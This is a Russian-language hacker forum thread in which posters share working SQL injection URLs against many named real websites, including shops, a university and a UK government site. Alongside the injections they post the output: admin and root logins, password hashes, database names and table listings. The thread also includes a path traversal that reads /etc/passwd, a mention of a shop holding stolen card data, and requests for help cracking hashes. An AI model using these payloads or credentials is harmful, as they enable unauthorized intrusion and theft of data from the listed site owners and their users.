SQL Инъекции

http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,username,2,3,password%20from%20users%20limit%201,1
Хмм.. это не сам facebook..
http://affinispace.com/facebook/

 

http://www.soulmenace.com​

Code:

http://www.soulmenace.com/schedule-detail.php?Id=-1+union+select+1,2,3,4,5,6,7--

Версия оказалась 4.0.27-standard и пришлось подбирать вручную.
Нашел таблицу prarez_soul.user, в ней подобрал имена: username и password. Вытащил логин с пассом:

Code:

http://www.soulmenace.com/schedule-detail.php?Id=-1+union+select+1,2,concat_ws(username,0x3a,password),4,5,6,7+from+prarez_soul.user--

prarez : djbamix

вход:

Code:

http://www.soulmenace.com/login.php

 

Code:

http://printer.konicaminoltaeurope.com/be/fr/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user--&PHPSESSID=66fba6d0283e0b2c99df64e3249e6916

логин/пасс:

Code:

admin:6d8369a953851a24

Code:

root:6d8369a953851a24

--------------------------------------------------------

Code:

http://www.beethovenmusic.nl/news.php?id=-1+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9+from+user--

логин/пасс:

Code:

admin:nevets1

--------------------------------------------------------
The End!

 

http://www.smeda.org/info.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
4.0.17-log - root@localhost - smeda_main01
pr - 5
тИЦ - 20

 

Code:

http://www.e-linebv.nl/news.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user,password),13,14,15,16+from+mysql.user--

логин/пасс:

Code:

root:05764bd379f12110

---------------------------------------------------------------

Code:

http://www.factorydirect.nl/news.php?id=-8+union+select+1,concat_ws(0x3a,log,pass),3,4+from+login--

логин/пасс:

Code:

tyra:[email protected]

---------------------------------------------------------------

Code:

http://www.waterpoortboys.nl/news.php?id=-8+union+select+1,concat_ws(0x3a,username,password),3,4+from+admins--

логин/пасс:

Code:

Alco:da77e9894373dc42c7d83650b5c3f9c2

---------------------------------------------------------------
The End!

 

Shop (есть картон...)

Один шоп с картоном, второй не юзал основательно.

 

www.citymix.ru - интернет-магазин одежды

Version: 5.0.27-log
User: citymix@localhost
Database: citymix

 

"Аренда интернет магазина" (Не сайт, а одна сплошная дырка)

Code:

http://www.indsite.ru/index.php?object=magazin&id_content=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--

2-ое поле принтабельно.
5-ая ветка.

Админка:

Code:

http://www.indsite.ru/im_index.php?file=input1.php

info41 : 1

Ну и:

Code:

http://www.indsite.ru/index.php?object=korzina&id0=36687&operation=../../../../../../../../etc/passwd

 

Помогите, пожалуйста, вынуть логин и пасс юзеров.
Вот скуля:

Список полей в таблице mtl_users:

Дальше пытаюсь вывести содержимое полей вот так:

Но ничего не выходит! Вылазит ошибка

Что делать? Как просмотреть данные ролей? Пробовал шифровать название таблицы, колонок (на всякий случай), заменять плюсы на просто пробелы и на /**/ - все равно не выводится

 

И не удивительно, ведь таблица mtl_users - пустая.

Code:

http://gta.com.ua/file_details.phtml?id=-1+union+select+1,2,3,concat_ws(0x2f,table_name,table_rows),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+36,1--

 

http://www.lifeskillstraining.com/faq.php?id=-6+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4--
4.1.20 - [email protected] - nhpa

 

Code:

http://rolemancer.ru/sections.php?op=viewarticle&artid=-666+union+all+select+1,2,concat(name,0x3a,0x3a,pass),4,5,6,7,8,9,10,11,12,13+from+users+limit+0,1/*

qwe::qw99ngkCljbZI

 

Code:

http://www.nskfitness.ru/articles.php?cat_id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11 --

5.0.67:[email protected]:sibdetiru_nskfit

 

http://www.autobaza.ro/car_details.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(0x3a3a,user,password),24,25+from+users+limit+0,1--

login: andrei
pass: andrei17


http://www.autobaza.ro/admin/


Админим ушлепков....

 

http://www.targetonline.ro/large_picture.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,adminuser_name,adminuser_password,adminuser_level),8+from+adminuser+limit+0,1--
login Liviu
pass a

http://www.targetonline.ro/admin

И еще один гомо-портал )) на закуску

 

www.wargames.ru

4.1.7:wargames@localhost:Wargames

 

http://www.rochester.edu/news/show.php?id=3136+and+substring(@@version,1,1)=3 - blind sql
http://www.rochester.edu/news/show.php?id=3136+and+substring(@@version,1,1)=4 - ошибка

 

http://new.groteck.ru/rss/?site_id=-1+union+select

можно раскрутить? или это просто бага?

 

http://www.herpconstrust.org.uk/news/expand-news.php?id=9999%20union%20select%201,2,3,4,version(),6,7,8

http://www.name.net/marketplace/search-domains.php?sub_category=999999%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12,13,14

http://www.name.net/marketplace/search-domains.php?sub_category=999999%20union%20select%201,2,3,4,concat(username,char(0x27),password),6,7,8,9,10,11,12,13,14%20from%20account



tbl:account,domain

name.net'*F4A92A0B0992BFEB56A81F234194BA8E4A010283 6 purchase | make offer
owenb'*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19

кто сбрутит пмните мне


http://www.asf.ca/news.php?id=9999%20uNion%20select%201,version(),3,4,5,6,7


http://www.atlantasilverbacks.com/news/displaynews.php?id=9999%20union%20select%201,2,version(),4,5,6,7,8,9,10,11,12

 

http://www.thecorporatelibrary.com/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(32,45,32),version(),user(),database()),10,11,12,13,14,15,16,17,18--
5.0.51b-community-nt - tcorplib@132102-APP1 - tclib
Список таблиц из information_schema:
-------
1:CHARACTER_SETS
2:COLLATIONS
3:COLLATION_CHARACTER_SET_APPLICABILITY
4:COLUMNS
5:COLUMN_PRIVILEGES
6:KEY_COLUMN_USAGE
7ROFILING
8:ROUTINES
9:SCHEMATA
10:SCHEMA_PRIVILEGES
11:STATISTICS
12:TABLES
13:TABLE_CONSTRAINTS
14:TABLE_PRIVILEGES
15:TRIGGERS
16:USER_PRIVILEGES
17:VIEWS
18:tcompanies
19:address
20:address2cart
21:calendar_events
22:cart
23:cart_bak
24:cartcc
25:category
26:change_log
27:company_bak
28:info
29:link
30:link_cat
31:news
32:news_categories
33erson
34roduct
35roduct2cart
36roduct2cart_bak
37roduct2category
38roduct_bak
39romotion
40:recommendations
41:site_section
42:state
43:subscription
44:testimonial
45:users
46:users_bak
--------------------------------------
http://www.roguegovernment.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10--
4.1.22-standart - roguegov_publicr@localhost-roguegov_rgov
----------------------------------------
http://www.monitor-nhsft.gov.uk/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
5.0.54 - monitor@localhost - nhsftreg
---------------------------------------------------
http://en.apa.az/news.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
5.0.67-community - apaadm_user@localhost - apaadm_en
------------
p.s. спите что ли?инъекций чо т мало выложено за сёдня..